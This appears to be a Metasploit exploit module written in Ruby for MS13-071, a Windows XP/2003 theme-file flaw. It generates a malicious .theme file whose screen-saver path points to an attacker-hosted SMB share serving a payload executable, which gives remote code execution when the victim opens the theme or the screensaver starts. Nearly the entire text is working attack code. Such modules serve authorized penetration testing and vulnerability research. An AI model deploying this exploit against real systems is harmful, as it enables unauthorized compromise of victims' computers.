114 lines
3.6 KiB
Ruby
114 lines
3.6 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
include Msf::Exploit::EXE
|
|
include Msf::Exploit::Remote::SMB::Server::Share
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",
|
|
'Description' => %q{
|
|
This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows
|
|
2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]
|
|
section. An arbitrary path can be used as screen saver, including a remote SMB resource,
|
|
which allows for remote code execution when a malicious .theme file is opened, and the
|
|
"Screen Saver" tab is viewed. The code execution is also triggered if the victim installs
|
|
the malicious theme and stays away from the computer, when Windows tries to display the
|
|
screensaver.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Eduardo Prado', # Vulnerability discovery
|
|
'juan vazquez', # Metasploit module
|
|
'Matthew Hall <hallm@sec-1.com>' # Metasploit module refactored to use Msf::Exploit::Remote::SMB::Server::Share
|
|
],
|
|
'References' =>
|
|
[
|
|
['CVE', '2013-0810'],
|
|
['OSVDB', '97136'],
|
|
['MSB', 'MS13-071'],
|
|
['BID', '62176'],
|
|
['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040'],
|
|
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell']
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'Space' => 2048,
|
|
'DisableNops' => true
|
|
},
|
|
'DefaultOptions' =>
|
|
{
|
|
'DisablePayloadHandler' => false
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
['Windows XP SP3 / Windows 2003 SP2', {}],
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => "Sep 10 2013",
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),
|
|
OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])
|
|
])
|
|
|
|
deregister_options('FOLDER_NAME')
|
|
deregister_options('FILE_CONTENTS')
|
|
end
|
|
|
|
def primer
|
|
self.file_contents = generate_payload_exe
|
|
print_status("Malicious SCR available on #{unc}...")
|
|
|
|
# Default Windows XP / 2003 theme modified
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
|
theme = <<-EOF
|
|
; Copyright (c) Microsoft Corp. 1995-2001
|
|
|
|
[Theme]
|
|
DisplayName=@themeui.dll,-2016
|
|
|
|
; My Computer
|
|
[CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon]
|
|
DefaultValue=%WinDir%explorer.exe,0
|
|
|
|
; My Documents
|
|
[CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon]
|
|
DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0
|
|
|
|
; My Network Places
|
|
[CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon]
|
|
DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17
|
|
|
|
; Recycle Bin
|
|
[CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon]
|
|
full=%WinDir%SYSTEM32\\shell32.dll,32
|
|
empty=%WinDir%SYSTEM32\\shell32.dll,31
|
|
|
|
[Control Panel\\Desktop]
|
|
Wallpaper=
|
|
TileWallpaper=0
|
|
WallpaperStyle=2
|
|
Pattern=
|
|
ScreenSaveActive=0
|
|
|
|
[boot]
|
|
SCRNSAVE.EXE=#{unc}
|
|
|
|
[MasterThemeSelector]
|
|
MTSM=DABJDKT
|
|
EOF
|
|
file_create(theme)
|
|
end
|
|
end
|